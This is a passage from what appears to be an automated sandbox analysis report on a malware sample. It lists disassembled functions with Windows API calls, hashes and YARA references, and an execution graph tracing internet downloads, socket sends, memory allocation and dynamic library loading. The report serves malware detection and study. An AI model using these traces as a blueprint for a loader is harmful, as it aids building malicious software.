                                                                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                              • Instruction Fuzzy Hash: 1E51E8BD9006299BDB22DB5CC8A0BD9B3BDAF49300F0045E5E509E7612DB70AF85CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028A357E
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028A35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028A35B1
                                                                                                                              • RegCloseKey.ADVAPI32(?,028A35D4,00000000,?,00000004,00000000,028A35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028A35C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                              • API String ID: 3677997916-4173385793
                                                                                                                              • Opcode ID: 700287bc617e2e13ab901f552a6bfcd6c4493e9e67fce71859f80a621ccbc873
                                                                                                                              • Instruction ID: 781fa26ee0f949a0c7e8faf771996eddcd35bb762a8c5cd91554d1e3f5c9625a
                                                                                                                              • Opcode Fuzzy Hash: 700287bc617e2e13ab901f552a6bfcd6c4493e9e67fce71859f80a621ccbc873
                                                                                                                              • Instruction Fuzzy Hash: 9B01B5BDA40318BAFB11DBD48C12BBDB3ECEB08710F1005A1BA14D7680EE789610DB55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AAA0C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,028AAAA3,?,?,00000000), ref: 028AAA24
                                                                                                                                • Part of subcall function 028AA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
                                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,028AAAA3,?,?,00000000), ref: 028AAA54
                                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 028AAA5F
                                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,028AAAA3,?,?,00000000), ref: 028AAA7D
                                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 028AAA88
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4102113445-0
                                                                                                                              • Opcode ID: 5247ab9e33151d2c0d81f23353cf178a3a35c9c541b5dca32444f7958f26f3b2
                                                                                                                              • Instruction ID: 3a268719fe41c6df560e897cd8ea0387e2f182ef51af17589a24d18fdbb3a166
                                                                                                                              • Opcode Fuzzy Hash: 5247ab9e33151d2c0d81f23353cf178a3a35c9c541b5dca32444f7958f26f3b2
                                                                                                                              • Instruction Fuzzy Hash: 5C01247C2002146EFA05AA7CCD31B2E72FDDB45720F550120E512E6AC4EE68AE00CAA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AAABC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,028AAC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028AAAEB
                                                                                                                                • Part of subcall function 028AA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                              • String ID: eeee$ggg$yyyy
                                                                                                                              • API String ID: 4232894706-1253427255
                                                                                                                              • Opcode ID: d8247356d74f016ec5abf525f5fc81e4b28f80be74fcafa54f188f8b635680c5
                                                                                                                              • Instruction ID: 823edad277f00b7342893cdcd99ae97e0a21bd0908da02ed3e2bbabdf95fef46
                                                                                                                              • Opcode Fuzzy Hash: d8247356d74f016ec5abf525f5fc81e4b28f80be74fcafa54f188f8b635680c5
                                                                                                                              • Instruction Fuzzy Hash: 7341E23C7045488BFB19EBAC88B027EF3BBDB85304B544525D482C7B44EE749E06DA22
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AC430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,028CA10B,00000000,028CA11E), ref: 028AC436
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028AC447
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                              • API String ID: 1646373207-3712701948
                                                                                                                              • Opcode ID: df5503ddebceabeb6dfb029564dfee8763a3b69788aaca8210e9d37669205651
                                                                                                                              • Instruction ID: 00178b1b9f463a67d8d8b11f6d7b163fcbae8077c705fae0577970753ba538c8
                                                                                                                              • Opcode Fuzzy Hash: df5503ddebceabeb6dfb029564dfee8763a3b69788aaca8210e9d37669205651
                                                                                                                              • Instruction Fuzzy Hash: AAD0A77CA867154EFF00AAF954B273523D8C70474AF14D82AE101D5245EFB584148F5A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AE1A4 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028AE253
                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028AE26F
                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028AE2E6
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 028AE30F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 920484758-0
                                                                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                              • Instruction ID: 08197bb054beef870993ee7436ef5bde365a5322f7453eb16e4abce6c27f3e04
                                                                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                              • Instruction Fuzzy Hash: E041F77DA006299FEB62DB58C8A0BC9B3BDAB48304F0045E5E64CE7611DF34AF818F51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AACF8 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028AAD15
                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028AAD39
                                                                                                                              • GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028AAD54
                                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028AADEA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3990497365-0
                                                                                                                              • Opcode ID: bef8fee2efae6e140b92d5177bf306fa4676ac3d538135c52226057c450ea2fe
                                                                                                                              • Instruction ID: 312af72af954a67e04863b2b7c8196380fe2923003f77fd89c9a8003d5178429
                                                                                                                              • Opcode Fuzzy Hash: bef8fee2efae6e140b92d5177bf306fa4676ac3d538135c52226057c450ea2fe
                                                                                                                              • Instruction Fuzzy Hash: D2414D7DA002589BEB21DB68CC94BDAB7FDAB08340F4440E5A648E7251EF74AF94CF11
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AACF6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028AAD15
                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028AAD39
                                                                                                                              • GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028AAD54
                                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028AADEA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3990497365-0
                                                                                                                              • Opcode ID: 3bed6929e5a64eb182ffd05c7a263d624f9f60786d231a68669244dc0752eed2
                                                                                                                              • Instruction ID: 842b387c5abef5beb62485275633bf79c76ca1d7c972dcede7b452d09d16925e
                                                                                                                              • Opcode Fuzzy Hash: 3bed6929e5a64eb182ffd05c7a263d624f9f60786d231a68669244dc0752eed2
                                                                                                                              • Instruction Fuzzy Hash: 78414F7CA002589BEB21DB68CC94BDAB7FDAB08341F4440E5A648E7251EF74AF94CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: da0bfbf7b235880fc07d8a62e1e7aa01fabda367db109c518e6d2fe3fe80c898
                                                                                                                              • Instruction ID: 60645dcec424bdeaf8a385715fbb4939467f1f03316ca79537d806849240d69e
                                                                                                                              • Opcode Fuzzy Hash: da0bfbf7b235880fc07d8a62e1e7aa01fabda367db109c518e6d2fe3fe80c898
                                                                                                                              • Instruction Fuzzy Hash: CBA1056E7106040BF718AA7C9CAC3BDB3C69BC4365F18823EE21DCB785EF68D9518651
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A94A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028A9596), ref: 028A952E
                                                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028A9596), ref: 028A9534
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                                              • String ID: yyyy
                                                                                                                              • API String ID: 3303714858-3145165042
                                                                                                                              • Opcode ID: 42318845882b5f40da2d8804bf08152533912fee6f619ae60cc17c6a6208ba3b
                                                                                                                              • Instruction ID: f0a07790088578bf14dfee0063de3933ba81a940c885f3729e94fe29e1748863
                                                                                                                              • Opcode Fuzzy Hash: 42318845882b5f40da2d8804bf08152533912fee6f619ae60cc17c6a6208ba3b
                                                                                                                              • Instruction Fuzzy Hash: 1621917DA052189FEF14DF68C861AAAB3F9EF48310F5140A5E905E7240EB709E40CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B9F9C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 028B9FD0
                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 028BA000
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 028BA01F
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 028BA02B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Read$Write
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3448952669-0
                                                                                                                              • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                              • Instruction ID: 239d18c16a5a578cdbbab0839881336be30f8c628f53a9d2d2fee463fcd6c9ce
                                                                                                                              • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                              • Instruction Fuzzy Hash: DE21C07D60021ADBDF15CE29CC80BEE73A9EF84361F088519FE14D7345EB34E8128AA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:99.3%
                                                                                                                              Signature Coverage:4.2%
                                                                                                                              Total number of Nodes:1677
                                                                                                                              Total number of Limit Nodes:41
                                                                                                                              execution_graph 96364 4675d06 96379 467b380 96364->96379 96366 4675d0f 96390 46620f6 96366->96390 96371 4677089 96414 4661e8d 96371->96414 96375 4661fd8 26 API calls 96376 467709e 96375->96376 96377 4661fd8 26 API calls 96376->96377 96378 46770aa 96377->96378 96420 46620df 96379->96420 96384 467b3c5 InternetReadFile 96388 467b3e8 96384->96388 96385 467b415 InternetCloseHandle InternetCloseHandle 96387 467b427 96385->96387 96387->96366 96388->96384 96388->96385 96389 4661fd8 26 API calls 96388->96389 96433 46620b7 96388->96433 96389->96388 96391 466210c 96390->96391 96392 46623ce 26 API calls 96391->96392 96393 4662126 96392->96393 96394 4662569 28 API calls 96393->96394 96395 4662134 96394->96395 96396 4664aa1 96395->96396 96397 4664ab4 96396->96397 96487 466520c 96397->96487 96399 4664ac9 ctype 96400 4664b40 WaitForSingleObject 96399->96400 96401 4664b20 96399->96401 96403 4664b56 96400->96403 96402 4664b32 send 96401->96402 96404 4664b7b 96402->96404 96493 468103a 56 API calls 96403->96493 96407 4661fd8 26 API calls 96404->96407 96406 4664b69 SetEvent 96406->96404 96408 4664b83 96407->96408 96409 4661fd8 26 API calls 96408->96409 96410 4664b8b 96409->96410 96410->96371 96411 4661fd8 96410->96411 96412 46623ce 26 API calls 96411->96412 96413 4661fe1 96412->96413 96413->96371 96416 4662163 96414->96416 96415 466219f 96415->96375 96416->96415 96502 4662730 26 API calls 96416->96502 96418 4662184 96503 4662712 26 API calls std::_Deallocate 96418->96503 96421 46620e7 96420->96421 96439 46623ce 96421->96439 96423 46620f2 96424 469bd51 96423->96424 96425 46a6137 96424->96425 96426 46a6175 96425->96426 96428 46a6149 __Getctype 96425->96428 96429 46a6160 HeapAlloc 96425->96429 96445 46a05dd 96426->96445 96428->96426 96428->96429 96444 46a2f80 7 API calls 2 library calls 96428->96444 96429->96428 96430 46a6173 96429->96430 96431 467b39e InternetOpenW InternetOpenUrlW 96430->96431 96431->96384 96434 46620bf 96433->96434 96435 46623ce 26 API calls 96434->96435 96436 46620ca 96435->96436 96449 466250a 96436->96449 96438 46620d9 96438->96388 96440 4662428 96439->96440 96441 46623d8 96439->96441 96440->96423 96441->96440 96443 46627a7 26 API calls std::_Deallocate 96441->96443 96443->96440 96444->96428 96448 46a8299 20 API calls 3 library calls 96445->96448 96447 46a05e2 96447->96431 96448->96447 96450 466251a 96449->96450 96451 4662535 96450->96451 96452 4662520 96450->96452 96466 46628e8 96451->96466 96456 4662569 96452->96456 96455 4662533 96455->96438 96477 4662888 96456->96477 96458 466257d 96459 46625a7 96458->96459 96460 4662592 96458->96460 96462 46628e8 28 API calls 96459->96462 96482 4662a34 28 API calls 96460->96482 96465 46625a5 96462->96465 96463 466259b 96483 46629da 28 API calls 96463->96483 96465->96455 96467 46628f1 96466->96467 96468 4662953 96467->96468 96469 46628fb 96467->96469 96486 46628a4 28 API calls 96468->96486 96472 4662904 96469->96472 96474 4662917 96469->96474 96485 4662cae 28 API calls __EH_prolog 96472->96485 96475 4662915 96474->96475 96476 46623ce 26 API calls 96474->96476 96475->96455 96476->96475 96478 4662890 96477->96478 96479 4662898 96478->96479 96484 4662ca3 28 API calls 96478->96484 96479->96458 96482->96463 96483->96465 96485->96475 96488 4665214 96487->96488 96489 46623ce 26 API calls 96488->96489 96490 466521f 96489->96490 96494 4665234 96490->96494 96492 466522e 96492->96399 96493->96406 96495 4665240 96494->96495 96496 466526e 96494->96496 96497 46628e8 28 API calls 96495->96497 96501 46628a4 28 API calls 96496->96501 96500 466524a 96497->96500 96500->96492 96502->96418 96503->96415 96504 46ac602 96509 46ac3d0 96504->96509 96507 46ac62a 96514 46ac3fb 96509->96514 96510 46a05dd __dosmaperr 20 API calls 96511 46ac5ee 96510->96511 96527 469bcec 26 API calls std::_Deallocate 96511->96527 96513 46ac54d 96513->96507 96521 46b5bbb 96513->96521 96517 46ac544 96514->96517 96524 46a2e49 46 API calls 2 library calls 96514->96524 96516 46ac58e 96516->96517 96525 46a2e49 46 API calls 2 library calls 96516->96525 96517->96510 96517->96513 96519 46ac5ad 96519->96517 96526 46a2e49 46 API calls 2 library calls 96519->96526 96528 46b5590 96521->96528 96523 46b5bd6 96523->96507 96524->96516 96525->96519 96526->96517 96527->96513 96531 46b559c ___FrameUnwindToState 96528->96531 96529 46b55aa 96530 46a05dd __dosmaperr 20 API calls 96529->96530 96532 46b55af 96530->96532 96531->96529 96533 46b55e3 96531->96533 96546 469bcec 26 API calls std::_Deallocate 96532->96546 96539 46b5b6a 96533->96539 96538 46b55b9 ___FrameUnwindToState 96538->96523 96548 46b6b53 96539->96548 96542 46b5607 96547 46b5630 LeaveCriticalSection __wsopen_s 96542->96547 96546->96538 96547->96538 96549 46b6b5f 96548->96549 96550 46b6b76 96548->96550 96551 46a05dd __dosmaperr 20 API calls 96549->96551 96552 46b6b7e 96550->96552 96553 46b6b95 96550->96553 96555 46b6b64 96551->96555 96556 46a05dd __dosmaperr 20 API calls 96552->96556 96628 46a85e1 10 API calls 2 library calls 96553->96628 96626 469bcec 26 API calls std::_Deallocate 96555->96626 96559 46b6b83 96556->96559 96557 46b6b9c MultiByteToWideChar 96560 46b6bcb 96557->96560 96561 46b6bbb GetLastError 96557->96561 96627 469bcec 26 API calls std::_Deallocate 96559->96627 96630 46a6137 21 API calls 3 library calls 96560->96630 96629 46a05a7 20 API calls __dosmaperr 96561->96629 96565 46b5b80 96565->96542 96573 46b5bdb 96565->96573 96566 46b6bd3 96567 46b6bfb 96566->96567 96568 46b6bda MultiByteToWideChar 96566->96568 96569 46a6782 _free 20 API calls 96567->96569 96568->96567 96570 46b6bef GetLastError 96568->96570 96571 46b6c10 96569->96571 96631 46a05a7 20 API calls __dosmaperr 96570->96631 96571->96565 96632 46b593e 96573->96632 96576 46b5c0d 96664 46a05ca 20 API calls __dosmaperr 96576->96664 96577 46b5c26 96650 46b02f5 96577->96650 96580 46b5c2b 96581 46b5c4b 96580->96581 96582 46b5c34 96580->96582 96663 46b58a9 CreateFileW 96581->96663 96665 46a05ca 20 API calls __dosmaperr 96582->96665 96584 46a05dd __dosmaperr 20 API calls 96590 46b5ba8 96584->96590 96586 46b5c39 96587 46a05dd __dosmaperr 20 API calls 96586->96587 96591 46b5c12 96587->96591 96588 46b5d01 GetFileType 96593 46b5d0c GetLastError 96588->96593 96594 46b5d53 96588->96594 96589 46b5c84 96589->96588 96592 46b5cd6 GetLastError 96589->96592 96666 46b58a9 CreateFileW 96589->96666 96620 46a6782 96590->96620 96591->96584 96667 46a05a7 20 API calls __dosmaperr 96592->96667 96668 46a05a7 20 API calls __dosmaperr 96593->96668 96669 46b023e 21 API calls 2 library calls 96594->96669 96597 46b5d1a CloseHandle 96597->96591 96599 46b5d43 96597->96599 96602 46a05dd __dosmaperr 20 API calls 96599->96602 96601 46b5cc9 96601->96588 96601->96592 96604 46b5d48 96602->96604 96603 46b5d74 96605 46b5dc0 96603->96605 96670 46b5aba 72 API calls 2 library calls 96603->96670 96604->96591 96610 46b5ded 96605->96610 96671 46b565c 72 API calls 3 library calls 96605->96671 96608 46b5de6 96609 46b5dfe 96608->96609 96608->96610 96609->96590 96612 46b5e7c CloseHandle 96609->96612 96672 46abd6c 29 API calls 2 library calls 96610->96672 96673 46b58a9 CreateFileW 96612->96673 96614 46b5ea7 96615 46b5eb1 GetLastError 96614->96615 96619 46b5df6 96614->96619 96674 46a05a7 20 API calls __dosmaperr 96615->96674 96617 46b5ebd 96675 46b0407 21 API calls 2 library calls 96617->96675 96619->96590 96621 46a67b6 __dosmaperr 96620->96621 96622 46a678d RtlFreeHeap 96620->96622 96621->96542 96622->96621 96623 46a67a2 96622->96623 96624 46a05dd __dosmaperr 18 API calls 96623->96624 96625 46a67a8 GetLastError 96624->96625 96625->96621 96626->96565 96627->96565 96628->96557 96629->96565 96630->96566 96631->96567 96633 46b595f 96632->96633 96634 46b5979 96632->96634 96633->96634 96637 46a05dd __dosmaperr 20 API calls 96633->96637 96676 46b58ce 96634->96676 96636 46b59b1 96640 46b59e0 96636->96640 96642 46a05dd __dosmaperr 20 API calls 96636->96642 96638 46b596e 96637->96638 96683 469bcec 26 API calls std::_Deallocate 96638->96683 96648 46b5a33 96640->96648 96685 46a4296 26 API calls 2 library calls 96640->96685 96643 46b59d5 96642->96643 96684 469bcec 26 API calls std::_Deallocate 96643->96684 96644 46b5a2e 96646 46b5aad 96644->96646 96644->96648 96686 469bd19 11 API calls _abort 96646->96686 96648->96576 96648->96577 96649 46b5ab9 96651 46b0301 ___FrameUnwindToState 96650->96651 96688 46a5888 EnterCriticalSection 96651->96688 96653 46b0308 96654 46b032d 96653->96654 96658 46b039b EnterCriticalSection 96653->96658 96660 46b034f 96653->96660 96692 46b00d4 21 API calls 3 library calls 96654->96692 96657 46b0378 ___FrameUnwindToState 96657->96580 96658->96660 96661 46b03a8 LeaveCriticalSection 96658->96661 96659 46b0332 96659->96660 96693 46b021b EnterCriticalSection 96659->96693 96689 46b03fe 96660->96689 96661->96653 96663->96589 96664->96591 96665->96586 96666->96601 96667->96591 96668->96597 96669->96603 96670->96605 96671->96608 96672->96619 96673->96614 96674->96617 96675->96619 96677 46b58e6 96676->96677 96678 46b5901 96677->96678 96679 46a05dd __dosmaperr 20 API calls 96677->96679 96678->96636 96680 46b5925 96679->96680 96687 469bcec 26 API calls std::_Deallocate 96680->96687 96682 46b5930 96682->96636 96683->96634 96684->96640 96685->96644 96686->96649 96687->96682 96688->96653 96694 46a58d0 LeaveCriticalSection 96689->96694 96691 46b0405 96691->96657 96692->96659 96693->96660 96694->96691 96695 467d58f 96696 467d5a0 96695->96696 96697 467d66b CreatePopupMenu AppendMenuA 96695->96697 96699 467d650 96696->96699 96701 467d5ab 96696->96701 96698 467d686 96697->96698 96699->96698 96702 467d656 Shell_NotifyIconA ExitProcess 96699->96702 96700 467d5b2 DefWindowProcA 96700->96698 96701->96700 96704 467d5c7 96701->96704 96705 467d614 IsWindowVisible 96701->96705 96704->96700 96706 467d5e5 GetCursorPos SetForegroundWindow TrackPopupMenu 96704->96706 96707 467d634 ShowWindow SetForegroundWindow 96705->96707 96708 467d624 ShowWindow 96705->96708 96706->96698 96707->96698 96708->96698 96709 66e1152 96712 66e1179 96709->96712 96713 66e11ab 96712->96713 96714 66e12b9 VirtualAlloc 96713->96714 96721 66e1168 96713->96721 96715 66e12e9 VirtualAlloc 96714->96715 96719 66e12fc GetPEB 96714->96719 96715->96719 96715->96721 96717 66e13c5 96718 66e147d GetPEB 96717->96718 96720 66e142e LoadLibraryA 96717->96720 96718->96721 96719->96717 96720->96717 96720->96721 96722 4694887 96723 4694893 ___FrameUnwindToState 96722->96723 96749 4694596 96723->96749 96725 469489a 96727 